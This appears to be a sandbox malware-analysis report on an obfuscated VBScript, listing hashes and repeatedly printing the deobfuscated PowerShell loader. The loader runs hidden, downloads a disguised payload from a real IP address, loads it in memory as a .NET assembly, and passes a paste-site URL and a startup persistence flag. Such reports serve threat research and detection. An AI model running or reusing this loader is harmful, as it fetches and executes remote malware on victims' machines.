Malicious
Malicious

d004101a2a747c086835148e400462f7

VBScript
|
MD5: d004101a2a747c086835148e400462f7
|
Size: 26.96 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d004101a2a747c086835148e400462f7
Sha1
a7f445c5b9ecf11234474e74b623351d052f8596
Sha256
5728fe1fbdd76d4b0ddb5e3cacb1aab8ccdaa03e6b53d497255eb24926f0ea67
Sha384
2a5156b18b58a235ea15600b773badfaa14f0fbb01859cbf04b379fd8df0c814657db2e4d0e51b814697c9f6dedab6d0
Sha512
3a26baaa449b6938abcc0648abfd079b6f5b24cedbd1ae35d52fb03bb6e45b497779726a6a400b2c288889a5576d90201500ea0a42cf946c0352cf09e895084c
SSDeep
384:duMBjmqhD09v1TBkg44BS9kWIkeLdIoenFm9H4XLSnRHvtCFinZeC7T9r7n:o6aqhD09v1TBR/AYLvDH+LhwZeC7T5n
TLSH
C0C2C767FF0963788B02674A9E0D12299D6412A31A339978FF3DC56F0F2743597B4E88
File Structure
d004101a2a747c086835148e400462f7
Malicious
d004101a2a747c086835148e400462f7.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

Invoke-Expression
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"
Deobfuscated PowerShell

Invoke-Expression
d004101a2a747c086835148e400462f7 (26.96 KB)
File Structure
d004101a2a747c086835148e400462f7
Malicious
d004101a2a747c086835148e400462f7.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
[Base64-Block]
Malicious
[Deobfuscated PS]
Malicious
[Deobfuscated PS]
Malicious
[PowerShell Command]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

http://www.ostrosoft.com/smtp.html

d004101a2a747c086835148e400462f7
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0]

Deobfuscated PowerShell

Invoke-Expression

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell

Invoke-Expression

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [PowerShell Command] > [Deobfuscated PS]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block]
Deobfuscated PowerShell

$null = ((New-Object "Net.WebClient")."DownloadString"("http://192.3.177.152/xampp/optimized_MSI.png") -match "BaseStart-(.*?)-BaseEnd") $valor = $matches[1] $assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor)) $olinia = "==QdB1mYR1UZr9SZslmZvkGch9SbvNmLulWYyRGblhXaw9yL6MHc0RHa" $type = $assembly."GetType"("ClassLibrary1.Home") $method = $type."GetMethod"("VAI") $method."Invoke"($null, [object[]] @({ @($olinia, "", "C:\Users\Public\Downloads", "RvfdKMRSNw", "CasPol", "", "CasPol", "", "https://pastefy.app/q4icoput/raw", "C:\Users\Public\Downloads", "RvfdKMRSNw", "vbs", "1", "", "dpeqgyPkky", "0", "startup_onstart") } ))

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Base64-Block] > [Deobfuscated PS]
Deobfuscated PowerShell

powershell -NoProfile -WindowStyle "Hidden" -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JG51bGwgPSAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMy4xNzcuMTUyL3hhbXBwL29wdGltaXplZF9NU0kucG5nJykgLW1hdGNoICdCYXNlU3RhcnQtKC4qPyktQmFzZUVuZCcpOyR2YWxvciA9ICRtYXRjaGVzWzFdOyRhc3NlbWJseSA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHZhbG9yKSk7JG9saW5pYSA9ICc9PVFkQjFtWVIxVVpyOVNac2xtWnZrR2NoOVNidk5tTHVsV1l5UkdibGhYYXc5eUw2TUhjMFJIYSc7JHR5cGUgPSAkYXNzZW1ibHkuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5Ib21lJyk7JG1ldGhvZCA9ICR0eXBlLkdldE1ldGhvZCgnVkFJJyk7JG1ldGhvZC5JbnZva2UoJG51bGwsIFtvYmplY3RbXV1AKCRvbGluaWEsJycsJ0M6XFVzZXJzXFB1YmxpY1xEb3dubG9hZHMnLCdSdmZkS01SU053JywnQ2FzUG9sJywnJywnQ2FzUG9sJywnJywnaHR0cHM6Ly9wYXN0ZWZ5LmFwcC9xNGljb3B1dC9yYXcnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnUnZmZEtNUlNOdycsJ3ZicycsJzEnLCcnLCdkcGVxZ3lQa2t5JywnMCcsJ3N0YXJ0dXBfb25zdGFydCcpKTs=')) | Invoke-Expression"

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS]
Deobfuscated PowerShell

Invoke-Expression

Malicious

d004101a2a747c086835148e400462f7 > d004101a2a747c086835148e400462f7.deobfuscated.vbs > [Command #0] > [Deobfuscated PS] > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙